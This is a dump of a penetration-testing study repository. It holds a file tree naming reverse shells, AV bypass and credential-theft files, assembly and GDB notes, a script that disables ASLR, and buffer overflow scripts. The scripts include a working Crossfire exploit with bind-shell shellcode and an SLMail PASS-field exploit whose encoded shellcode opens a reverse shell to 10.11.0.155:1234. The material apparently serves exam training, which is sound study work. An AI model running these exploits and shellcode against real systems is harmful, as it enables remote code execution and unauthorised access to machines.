├── .gitignore ├── LICENSE ├── README.md ├── bookmarks.md ├── buffer_overflow ├── assembly │ ├── 64_ia_32_jmp_instructions.pdf │ ├── IntelCodeTable_x86.pdf │ ├── Radare2 cheat sheet.txt │ ├── course_notes.md │ ├── debuging.md │ ├── images │ │ ├── 0x80_interupt_system_calls.png │ │ ├── IntelRegisters.gif │ │ ├── cpu_modes.png │ │ ├── general_purpose_registers.png │ │ ├── linux_models.png │ │ ├── memory_arch.png │ │ ├── memory_maps.png │ │ ├── memory_models.png │ │ └── write_system_call.png │ ├── x86_assembly_x86_architecture.pdf │ └── x86_opcode_structure_and_instruction_overview.png ├── buffer_overflows.md ├── gdb_cheat_sheet.pdf ├── r2_cheatsheet.pdf ├── scripts │ ├── bad_chars.txt │ ├── disable_linux_security.sh │ ├── linux_bo_exploit.rb │ ├── linux_bo_poc.py │ ├── payload.py │ ├── windows_bo_exploit.rb │ └── windows_bo_fuzzer.py └── win32_buffer_overflow_exploitation.md ├── cheatSheets ├── Cheatsheet_AIXBuild.txt ├── Cheatsheet_AVBypass.txt ├── Cheatsheet_ApacheSSL.txt ├── Cheatsheet_AttackingMSSQL.txt ├── Cheatsheet_BashScripting.txt ├── Cheatsheet_BuildReviews.txt ├── Cheatsheet_CTF.txt ├── Cheatsheet_CiscoIOS.txt ├── Cheatsheet_CookieStealing.txt ├── Cheatsheet_DomainAdminExploitation.txt ├── Cheatsheet_ExploitDev.txt ├── Cheatsheet_GDB.txt ├── Cheatsheet_GPG.txt ├── Cheatsheet_HTTPBasicAuth.txt ├── Cheatsheet_IKEScan.txt ├── Cheatsheet_LinuxPrivilegeEsc.txt ├── Cheatsheet_LocalSamDump.txt ├── Cheatsheet_MSFPostExploitation.txt ├── Cheatsheet_Metasploit.pdf ├── Cheatsheet_MetasploitPayloads.txt ├── Cheatsheet_MobileAppTesting.txt ├── Cheatsheet_Networking.txt ├── Cheatsheet_OWASPCheckList.txt ├── Cheatsheet_Oracle.txt ├── Cheatsheet_PenTesting.txt ├── Cheatsheet_Pyinstaller.txt ├── Cheatsheet_Python.pdf ├── Cheatsheet_Remediations.txt ├── Cheatsheet_SMBCapture.txt ├── Cheatsheet_SMBEnumeration.txt ├── Cheatsheet_SMTPOpenRelay.txt ├── Cheatsheet_SQLInjection.txt ├── Cheatsheet_SSLStrip.txt ├── Cheatsheet_Solaris.txt ├── Cheatsheet_Tools.txt ├── Cheatsheet_UsefulCommands.txt ├── Cheatsheet_VOIP.txt ├── Cheatsheet_Vlans.txt ├── Cheatsheet_VulnVerify.txt ├── Cheatsheet_WindowsCommandLine.pdf ├── Cheatsheet_WirelessTesting.txt ├── Cheatsheet_scp.txt ├── beginners_python_cheat_sheet.pdf ├── complexity_cheatsheet.pdf ├── egghead-react-cheat-sheet-0-14-7.pdf ├── egghead-redux-cheat-sheet-3-2-1.pdf ├── emmet_cheat_sheet.pdf ├── es6_cheat_sheet.txt ├── html5_cheat_sheet.pdf ├── jquery_cheat_sheet_1.3.2.pdf ├── reverse_shell_with_msfvenom.txt ├── sass.png ├── sass_functions.pdf └── sass_functions.txt ├── client_side └── signed_applet.java ├── crypto └── Crypto101.pdf ├── enumeration ├── active_information_gathering.md ├── configuration_management.md ├── dns_enumeration.md ├── file_enumeration.md ├── http_enumeration.md ├── information_gathering_owasp_guide.md ├── miniserv_webmin_enumeration.md ├── ms_sql_server_enumeration.md ├── nfs_enumeration.md ├── osint_recon_ng.md ├── passive_information_gathering.md ├── pop3_enumeration.md ├── rpc_enumeration.md ├── scanning.md ├── smb_enumeration.md ├── smtp_enumeration.md ├── snmb_enumeration.md ├── tools │ ├── host_list.sh │ ├── linenumv2.sh │ ├── mass.sh │ ├── recon_scan │ │ ├── dirbust.py │ │ ├── dnsrecon.py │ │ ├── finger-user-enum.pl │ │ ├── ftprecon.py │ │ ├── readme.txt │ │ ├── reconscan.py │ │ ├── samrdump.py │ │ ├── smbrecon.py │ │ ├── smtp-user-enum.pl │ │ ├── smtprecon.py │ │ ├── snmprecon.py │ │ └── sshrecon.py │ ├── reconscan.py │ └── remoterecon.py ├── vulnerability_scanning.md └── windows_enumeration.md ├── exploitation ├── 643-fixed ├── File_Transfers.md ├── Post-Exploitation.md ├── Public Exploits.md ├── computer_network_exploits.md ├── downloadproxy.ps1 ├── ftp-txt ├── jsp_processbuilder_shell.java ├── jspb64_shell.java ├── minimum_csharp_shell.java ├── nc_transfers.txt ├── openfuck.c ├── powershell_to_meterpreter.sh ├── reverse.ps1 ├── reverse_shell.py ├── reverse_shell_with_msfvenom.md ├── setuid.c ├── trans2open.c ├── useradd.c ├── wget-ps1 ├── wget-vbs └── wget.vbs ├── images ├── 33.png ├── 34.png ├── 35.png ├── 36.png ├── 37.png ├── 38.png ├── 39.png ├── 40.png ├── 41.png ├── 42.png ├── 43.png ├── 44.png ├── FDDI_Dual_Token_Ring.jpg ├── ICMP-Header.png ├── IP-Header-v6.png ├── IP-Header.png ├── TCP-Header.png ├── Token_ring.svg ├── UDP-Header.png ├── active_passive_ftp.png ├── arp.png ├── broadcast_addresses.png ├── cable_categories.png ├── cable_categories_2.png ├── cidr.png ├── common_ports.jpg ├── dns.png ├── dns_hierarchy.png ├── dns_security.png ├── encapsulation_decapcultations.png ├── fddi_basic2.gif ├── ftp.png ├── how_protocal_stacks_communicate.png ├── how_tcp_packets_are_created.png ├── icmp_header_2.png ├── inside_stack.png ├── ip6_addressing.png ├── ip6_features.png ├── ip6_vs_ip4.png ├── ip_osi.png ├── ip_v6_addressing.png ├── ipv6-ipv4-vs-ipv6-header.png ├── mac_ip_1.png ├── mac_ip_2.png ├── network_design.png ├── network_device.png ├── new_breed_of_swithces.png ├── osi_model.jpg ├── osi_tcp_models.png ├── osi_vs_tcp_ip.png ├── ping.png ├── ports_protocols.png ├── private_addresses.png ├── private_adresses.png ├── routing.png ├── subnet_classes.png ├── tcp.png ├── tcp_close_connection.png ├── tcp_connection.png ├── tcp_header_2.png ├── tcp_uses.png ├── tcp_vs_udp.png ├── traceroute.png ├── udp.png ├── udp_header_2.png ├── upd_uses.png └── vlan_nac.png ├── md_tree.sh ├── networking ├── bpf_syntax.md ├── networking_concept.md ├── nmap_quick_reference_guide.pdf └── tcpdump.pdf ├── os ├── kali_linux_commands.md ├── lunux_windows_commands.md ├── preparing_kali.md ├── preparing_windows.md └── useful_commands.md ├── oscp_resources ├── OSCP-Survival-Guide.md ├── jolly_frog.html └── oscp_course_layout.md ├── password_attack └── common_password_topologies.txt ├── port_forwarding └── nc_relays.txt ├── priv_escalation ├── Privilege_Escalation.md ├── Privledge_Logic_Transport.md ├── escalation_gathering.sh ├── windows_priv_escalation.md └── windows_priv_escalation_practical.md ├── scripts ├── cred_check.py ├── hash_check.py ├── sqldeli.py ├── string_decode.py └── xploit_installer.py ├── social_engineering ├── social_engineering.md └── tools │ └── scythe │ ├── README.md │ ├── accountfile.txt │ ├── documentation │ └── module_overview.md │ ├── license │ ├── logfile.txt │ ├── modules │ ├── blogs │ │ ├── blogspot_user.xml │ │ ├── delicious_user.xml │ │ ├── goodreads_user.xml │ │ ├── livejournal_user.xml │ │ ├── mahalo_user.xml │ │ ├── newsvine_user.xml │ │ ├── posterous_user.xml │ │ ├── resumebucket_user.xml │ │ ├── squidoo_user.xml │ │ ├── tumblr.com_email.xml │ │ ├── tumblr.com_username.xml │ │ └── wordpress.com.xml │ ├── commerce │ │ ├── ebay.com_user.xml │ │ ├── etsy_user.xml │ │ └── kaboodle_user.xml │ ├── development │ │ ├── github.com_email.xml │ │ └── github.com_user.xml │ ├── examples.xml │ ├── forums │ │ ├── backtrack_forum_username.xml │ │ ├── buzznet_user.xml │ │ ├── cafemom_user.xml │ │ ├── colourlovers_user.xml │ │ ├── deviantart_user.xml │ │ ├── epinions_user.xml │ │ ├── families_user.xml │ │ ├── fanpop_user.xml │ │ ├── instructables_user.xml │ │ └── wikipedia_user.xml │ ├── games │ │ ├── kongregate_user.xml │ │ └── xfire_user.xml │ ├── media │ │ ├── dailymotion_user.xml │ │ ├── flickr_user.xml │ │ ├── funnyordie_user.xml │ │ ├── hulu_user.xml │ │ ├── justintv_user.xml │ │ ├── lastfm_user.xml │ │ ├── photobucket_user.xml │ │ ├── soundcloud_user.xml │ │ ├── twitpic_user.xml │ │ ├── ustream_user.xml │ │ ├── vimeo_user.xml │ │ ├── yfrog_user.xml │ │ ├── youtube_user.xml │ │ └── zooomr_user.xml │ ├── social │ │ ├── badoo_user.xml │ │ ├── bitly_user.xml │ │ ├── cardcloud_user.xml │ │ ├── disqus_user.xml │ │ ├── facebook_email_phone.com.xml │ │ ├── flixster_user.xml │ │ ├── foursquare_user.xml │ │ ├── gather_user.xml │ │ ├── linkedin_user.xml │ │ ├── myspace_user.xml │ │ ├── reddit.com_username.xml │ │ ├── slideshare_user.xml │ │ ├── stumbleupon_user.xml │ │ ├── twitter.com_email_phone.xml │ │ ├── twitter.com_username.xml │ │ ├── wefollow_user.xml │ │ └── xing.com.xml │ └── webmail │ │ ├── gmail_user.xml │ │ ├── hushmail.xml │ │ └── yahoo_email.xml │ ├── scythe.ico │ ├── scythe.py │ ├── scythe_0.2.8.exe │ └── test.log ├── templates ├── PWKv1-REPORT.doc ├── linux-template.md ├── pwkv1_report.doc └── windows-template.md ├── useful_tricks.md ├── web_pentest ├── auxiliary_info.md ├── file_upload.md ├── scripts │ ├── dir_run_gobuster.sh │ ├── lfi_infile.py │ ├── sqli_timebased.py │ ├── xss_bmp_header.py │ └── xss_gif_header.py ├── sqli.md ├── sqli_cheatsheet.md ├── web_app_security.md ├── xss.json ├── xss.md ├── xss.png └── xss_actionscript └── wifi └── wifi_penetration_testing.md /.gitignore: -------------------------------------------------------------------------------- 1 | .vscode/* 2 | !.vscode/settings.json 3 | !.vscode/tasks.json 4 | !.vscode/launch.json 5 | !.vscode/extensions.json 6 | 7 | # General 8 | .DS_Store 9 | .AppleDouble 10 | .LSOverride 11 | 12 | # Icon must end with two \r 13 | Icon 14 | 15 | # Thumbnails 16 | ._* 17 | 18 | # Files that might appear in the root of a volume 19 | .DocumentRevisions-V100 20 | .fseventsd 21 | .Spotlight-V100 22 | .TemporaryItems 23 | .Trashes 24 | .VolumeIcon.icns 25 | .com.apple.timemachine.donotpresent 26 | 27 | # Directories potentially created on remote AFP share 28 | .AppleDB 29 | .AppleDesktop 30 | Network Trash Folder 31 | Temporary Items 32 | .apdisk 33 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2017 Anas Aboureada 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /buffer_overflow/assembly/64_ia_32_jmp_instructions.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/64_ia_32_jmp_instructions.pdf -------------------------------------------------------------------------------- /buffer_overflow/assembly/IntelCodeTable_x86.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/IntelCodeTable_x86.pdf -------------------------------------------------------------------------------- /buffer_overflow/assembly/course_notes.md: -------------------------------------------------------------------------------- 1 | # x86 Assembly Language and Shellcoding on Linux - Pentester Academy (study notes) 2 | 3 | ## Know your cpu 4 | 5 | ```Shell 6 | >> lscpu 7 | >> cat /proc/cpuifo 8 | ``` 9 | 10 | ## General Purpose registers 11 | 12 | ![](./images/IntelRegisters.gif) 13 | 14 | ## Investegating CPU registers 15 | 16 | ```Shell 17 | # First attach gdp to a running process 18 | >> gdp /bin/bash 19 | 20 | # set a break point 21 | >> (gdb) break main 22 | 23 | # See all CPU registers 24 | >> (gdb) info registers 25 | 26 | # See EAX in hex (General purpose flag) 27 | >> (gdb) display /x $ax 28 | >> (gdb) display /x $eax 29 | >> (gdb) display /x $ax 30 | >> (gdb) display /x $ah 31 | ``` 32 | 33 | ## Checking which command will run next 34 | 35 | ```Shell 36 | >> (gdb) disassemble $eip 37 | ``` 38 | 39 | ## To see all registers 40 | 41 | ```Shell 42 | >> (gdb) info all-registers 43 | ``` 44 | 45 | ## Change gdb to show Intel syntax instead of AT&T 46 | 47 | ```Shell 48 | >> (gdb) set disassembly-flavor intel 49 | ``` 50 | 51 | ## CPU Modes 52 | 53 | ![](./images/cpu_modes.png) 54 | 55 | ## Memory Models 56 | 57 | ![](./images/memory_models.png) 58 | 59 | ## Linux Mode and memory model 60 | 61 | ![](./images/linux_models.png) 62 | 63 | ## Memory arch 64 | 65 | ![](./images/memory_arch.png) 66 | 67 | ## Investigating memory of a running process 68 | 69 | ![](./images/memory_maps.png) 70 | 71 | ```Shell 72 | # Get proccess pid 73 | >> ps | grep 74 | >> cat /proc//maps 75 | ``` 76 | 77 | OR 78 | 79 | ```Shell 80 | >> pmap -d 81 | ``` 82 | 83 | OR Attach the process to GDB 84 | 85 | ```Shell 86 | >> (gdb) info proc mappings 87 | ``` 88 | 89 | ## Get all system code numbers 90 | 91 | ```Shell 92 | >> vim /usr/include/i386-linux-gnu/asm/unistd_32.h 93 | ``` 94 | 95 | ## Invoking system calls with interupt 0x80 96 | 97 | ![](./images/0x80_interupt_system_calls.png) 98 | ![](./images/write_system_call.png) 99 | 100 | ## To see the manual for a system function 101 | 102 | ```Shell 103 | >> man 2 104 | # e.g. 105 | >> man 2 write 106 | ``` 107 | 108 | ## Creating our first assembly app 109 | 110 | [hello_world.asm](./source/hello_world.asm) 111 | 112 | ```Shell 113 | # building 114 | >> nasm -f elf32 hello_world.asm -o hello_world.o 115 | 116 | # linking 117 | >> ld hello_world.o -o HelloWorld 118 | 119 | # running 120 | >> ./HelloWorld 121 | 122 | # Debugging 123 | >> gdb ./HelloWorld 124 | >> (gdb) break _start 125 | >> (gdb) run 126 | >> (gdb) set disassembly-flavor intel 127 | >> (gdb) disassemble 128 | >> (gdb) info registers 129 | >> (gdb) stepibb 130 | ``` 131 | -------------------------------------------------------------------------------- /buffer_overflow/assembly/debuging.md: -------------------------------------------------------------------------------- 1 | # Debuging using GDB 2 | 3 | ## Compiling C code with GDB debug symbols 4 | 5 | ```Shell 6 | >> gcc -ggdb -o 7 | ``` 8 | -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/0x80_interupt_system_calls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/0x80_interupt_system_calls.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/IntelRegisters.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/IntelRegisters.gif -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/cpu_modes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/cpu_modes.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/general_purpose_registers.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/general_purpose_registers.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/linux_models.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/linux_models.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/memory_arch.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/memory_arch.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/memory_maps.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/memory_maps.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/memory_models.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/memory_models.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/images/write_system_call.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/images/write_system_call.png -------------------------------------------------------------------------------- /buffer_overflow/assembly/x86_assembly_x86_architecture.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/x86_assembly_x86_architecture.pdf -------------------------------------------------------------------------------- /buffer_overflow/assembly/x86_opcode_structure_and_instruction_overview.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/assembly/x86_opcode_structure_and_instruction_overview.png -------------------------------------------------------------------------------- /buffer_overflow/gdb_cheat_sheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/gdb_cheat_sheet.pdf -------------------------------------------------------------------------------- /buffer_overflow/r2_cheatsheet.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wirasecure/pentest-notes/9a9d4117cebf06597c050904b387fd14ab59096f/buffer_overflow/r2_cheatsheet.pdf -------------------------------------------------------------------------------- /buffer_overflow/scripts/bad_chars.txt: -------------------------------------------------------------------------------- 1 | badchars = "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b" + 2 | "\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a" + 3 | "\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59" + 4 | "\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78" + 5 | "\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97" + 6 | "\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6" + 7 | "\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5" + 8 | "\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4" + 9 | "\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff" 10 | -------------------------------------------------------------------------------- /buffer_overflow/scripts/disable_linux_security.sh: -------------------------------------------------------------------------------- 1 | cat /proc/sys/kernel/randomize_va_space 2 | sudo bash -c 'echo "kernel.randomize_va_space = 0" >> /etc/sysctl.conf' 3 | sudo sysctl -p 4 | cat /proc/sys/kernel/randomize_va_space 5 | # verify "0" 6 | ulimit -c unlimited 7 | ulimit -c 8 | -------------------------------------------------------------------------------- /buffer_overflow/scripts/linux_bo_exploit.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | =begin 4 | This exploit takes advantage of a buffer overflow vulnerability during the 5 | sound setup stage of the game Crossfire. 6 | =end 7 | 8 | require 'socket' 9 | 10 | #total size = 4379 11 | #offset = 4368 12 | #bad chars = "\x00\x0a\x0d\x20" 13 | 14 | #add eax, 12 = 83C00C 15 | #jmp eax = FFE0 16 | 17 | 18 | #create shellcode 19 | #creates a bind shell on port 4444 20 | shellcode = "\xba\xe9\x41\x08\x31\xdb\xd3\xd9\x74\x24\xf4\x58\x29\xc9\xb1"+ 21 | "\x14\x31\x50\x14\x83\xc0\x04\x03\x50\x10\x0b\xb4\x39\xea\x3c"+ 22 | "\xd4\x69\x4f\x91\x71\x8c\xc6\xf4\x36\xf6\x15\x76\x6d\xa9\xf7"+ 23 | "\x1e\x90\x55\xe9\x82\xfe\x45\x58\x6a\x76\x84\x30\xec\xd0\x8a"+ 24 | "\x45\x79\xa1\x10\xf5\x7d\x92\x7f\x34\xfd\x91\xcf\xa0\x30\x95"+ 25 | "\xa3\x74\xa0\xa9\x9b\x4b\xb4\x9f\x62\xac\xdc\x30\xba\x3f\x74"+ 26 | "\x27\xeb\xdd\xed\xd9\x7a\xc2\xbd\x76\xf4\xe4\x8d\x72\xcb\x67" 27 | 28 | #create buffer to cause the crash 29 | buffer = "\x90" * (4368 - 105) 30 | 31 | 32 | #create eip value 33 | eip = "\x97\x45\x13\x08" 34 | 35 | #create stage one 36 | stage_one = "\x83\xC0\x0C\xFF\xE0" 37 | 38 | #create padding 39 | padding = "\x90" * (4379 - 4368 - 4 - 5) 40 | 41 | #assemble payload 42 | payload = "\x11(setup sound " + shellcode + buffer + eip + stage_one + padding + "\x90\x00\#" 43 | 44 | #send payload 45 | puts "sending payload..." 46 | socket = Socket.tcp("127.0.0.1", 13327) 47 | socket.write(payload) 48 | puts socket.gets.chomp 49 | socket.close 50 | puts "payload sent... socket closed..." 51 | exit(0) 52 | -------------------------------------------------------------------------------- /buffer_overflow/scripts/linux_bo_poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | 4 | host = "127.0.0.1" 5 | 6 | crash = "\x41" * 4379 7 | 8 | buffer = "\x11(setup sound " + crash + "\x90\x00#" 9 | 10 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 11 | print "[*]Sending evil buffer..." 12 | s.connect((host, 13327)) 13 | s.send(buffer) 14 | data=s.recv(1024) 15 | print data 16 | s.close() 17 | print "[*]Payload sent !" 18 | -------------------------------------------------------------------------------- /buffer_overflow/scripts/payload.py: -------------------------------------------------------------------------------- 1 | prefix = "\\x41" * 80 2 | eip = "\\x42" * 4 3 | nop = "\\x90" * (400 - 137) 4 | buf = "" 5 | buf += "\\xba\\x8a\\x2a\\xb0\\xa4\\xd9\\xed\\xd9\\x74\\x24\\xf4\\x5d\\x31" 6 | buf += "\\xc9\\xb1\\x1c\\x31\\x55\\x14\\x03\\x55\\x14\\x83\\xed\\xfc\\x68" 7 | buf += "\\xdf\\xda\\xd9\\x34\\xb9\\xa9\\x25\\x7d\\xb9\\xdd\\x29\\x7d\\x33" 8 | buf += "\\x3e\\x4f\\xfc\\xa0\\xc1\\x60\\x33\\xa6\\xf3\\x5b\\x3c\\x44\\xa0" 9 | buf += "\\x18\\x91\\xe1\\x45\\x16\\xf4\\x46\\x2f\\xe5\\x76\\xf7\\xda\\xf1" 10 | buf += "\\x22\\x92\\x18\\x90\\xcb\\x32\\x8a\\xed\\x2a\\xd8\\xba\\xb6\\xc6" 11 | buf += "\\x7b\\x9b\\x85\\x96\\x13\\x98\\xd2\\x82\\x42\\xc4\\x84\\xf8\\x1c" 12 | buf += "\\xf8\\x38\\xed\\x80\\x96\\x28\\x5c\\x69\\xee\\xa8\\x34\\xef\\xa8" 13 | buf += "\\xe7\\x48\\x3e\\xab\\x48\\x2e\\x0c\\xac\\xf9\\xed\\x3e\\xcb\\x70" 14 | buf += "\\xa0\\x3a\\xd9\\x03\\xd1\\xf5\\xed\\xb3\\xd6\\x34\\x6d\\x34\\x07" 15 | buf += "\\x9d\\xde\\x3d\\x7a\\xa2\\xe0\\xa3" 16 | 17 | payload = prefix + eip + nop + buf 18 | print(payload) 19 | 20 | with open('payload.txt', 'w') as f: 21 | hex_content = f.write(payload) 22 | -------------------------------------------------------------------------------- /buffer_overflow/scripts/windows_bo_exploit.rb: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env ruby 2 | 3 | =begin 4 | takes advantage of the LONG_PASS buffer overflow vulnerability in SLMAIL. 5 | uses windows/shell_reverse_tcp payload 6 | connects to 10.11.0.155:1234 7 | encoded with 1 pass of x86/shitaka_ga_nai 8 | =end 9 | 10 | require 'socket' 11 | 12 | #bad chars = "\x00\x0a\x0d" 13 | #jmp esp address = 5F4A358F 14 | 15 | #create padding to crash the program 16 | buffer = "A" * 2606 17 | 18 | #create eip register value 19 | eip = "\x8f\x35\x4a\x5f" 20 | 21 | #create encoder buffer 22 | encoder_buffer = "\x90" * 16 23 | 24 | #create shellcode 25 | shellcode = "\xba\xd1\x38\xf2\x36\xda\xc6\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1"+ 26 | "\x52\x31\x56\x12\x83\xee\xfc\x03\x87\x36\x10\xc3\xdb\xaf\x56"+ 27 | "\x2c\x23\x30\x37\xa4\xc6\x01\x77\xd2\x83\x32\x47\x90\xc1\xbe"+ 28 | "\x2c\xf4\xf1\x35\x40\xd1\xf6\xfe\xef\x07\x39\xfe\x5c\x7b\x58"+ 29 | "\x7c\x9f\xa8\xba\xbd\x50\xbd\xbb\xfa\x8d\x4c\xe9\x53\xd9\xe3"+ 30 | "\x1d\xd7\x97\x3f\x96\xab\x36\x38\x4b\x7b\x38\x69\xda\xf7\x63"+ 31 | "\xa9\xdd\xd4\x1f\xe0\xc5\x39\x25\xba\x7e\x89\xd1\x3d\x56\xc3"+ 32 | "\x1a\x91\x97\xeb\xe8\xeb\xd0\xcc\x12\x9e\x28\x2f\xae\x99\xef"+ 33 | "\x4d\x74\x2f\xeb\xf6\xff\x97\xd7\x07\xd3\x4e\x9c\x04\x98\x05"+ 34 | "\xfa\x08\x1f\xc9\x71\x34\x94\xec\x55\xbc\xee\xca\x71\xe4\xb5"+ 35 | "\x73\x20\x40\x1b\x8b\x32\x2b\xc4\x29\x39\xc6\x11\x40\x60\x8f"+ 36 | "\xd6\x69\x9a\x4f\x71\xf9\xe9\x7d\xde\x51\x65\xce\x97\x7f\x72"+ 37 | "\x31\x82\x38\xec\xcc\x2d\x39\x25\x0b\x79\x69\x5d\xba\x02\xe2"+ 38 | "\x9d\x43\xd7\xa5\xcd\xeb\x88\x05\xbd\x4b\x79\xee\xd7\x43\xa6"+ 39 | "\x0e\xd8\x89\xcf\xa5\x23\x5a\xfa\x32\x2b\x01\x92\x46\x2b\x31"+ 40 | "\xb1\xce\xcd\x53\x25\x87\x46\xcc\xdc\x82\x1c\x6d\x20\x19\x59"+ 41 | "\xad\xaa\xae\x9e\x60\x5b\xda\x8c\x15\xab\x91\xee\xb0\xb4\x0f"+ 42 | "\x86\x5f\x26\xd4\x56\x29\x5b\x43\x01\x7e\xad\x9a\xc7\x92\x94"+ 43 | "\x34\xf5\x6e\x40\x7e\xbd\xb4\xb1\x81\x3c\x38\x8d\xa5\x2e\x84"+ 44 | "\x0e\xe2\x1a\x58\x59\xbc\xf4\x1e\x33\x0e\xae\xc8\xe8\xd8\x26"+ 45 | "\x8c\xc2\xda\x30\x91\x0e\xad\xdc\x20\xe7\xe8\xe3\x8d\x6f\xfd"+ 46 | "\x9c\xf3\x0f\x02\x77\xb0\x30\xe1\x5d\xcd\xd8\xbc\x34\x6c\x85"+ 47 | "\x3e\xe3\xb3\xb0\xbc\x01\x4c\x47\xdc\x60\x49\x03\x5a\x99\x23"+ 48 | "\x1c\x0f\x9d\x90\x1d\x1a" 49 | 50 | #create padding 51 | padding = "C" * (3500 - 2606 - 4 - 16 - 351) 52 | 53 | #assemble payload 54 | payload = buffer + eip + encoder_buffer + shellcode + padding 55 | 56 | 57 | #send payload 58 | puts "sending payload..." 59 | socket = Socket.tcp("10.11.13.62", 110) 60 | socket.gets.chomp 61 | socket.write("USER test\r\n") 62 | socket.gets.chomp 63 | socket.write("PASS #{payload} \r\n") 64 | socket.write("QUIT\r\n") 65 | socket.close 66 | puts "payload sent... socket closed..." 67 | exit(0) 68 | -------------------------------------------------------------------------------- /buffer_overflow/scripts/windows_bo_fuzzer.py: 